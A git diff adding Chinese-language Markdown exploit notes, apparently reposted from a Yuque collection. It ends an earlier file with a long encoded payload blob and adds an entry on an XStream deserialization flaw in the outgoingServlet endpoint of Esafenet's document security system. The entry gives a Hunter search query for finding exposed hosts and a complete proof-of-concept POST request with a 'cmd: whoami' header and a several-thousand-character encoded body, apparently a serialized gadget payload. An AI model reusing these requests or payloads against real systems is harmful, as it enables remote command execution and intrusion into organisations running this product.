PENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706613497965-794e01ba-5634-4f39-9e7b-455e2dd344a0.png](./img/Rr2cMZleZrlHwlbu/1706613497965-794e01ba-5634-4f39-9e7b-455e2dd344a0-897064.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewq00b57bhtr68ry>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..55195e0
--- /dev/null
+++ b/亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统outgoingServlet存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统outgoingServlet存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/9ub3M2YstuwfNIbt/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-292030.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/outgoingServlet HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.31.208:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIII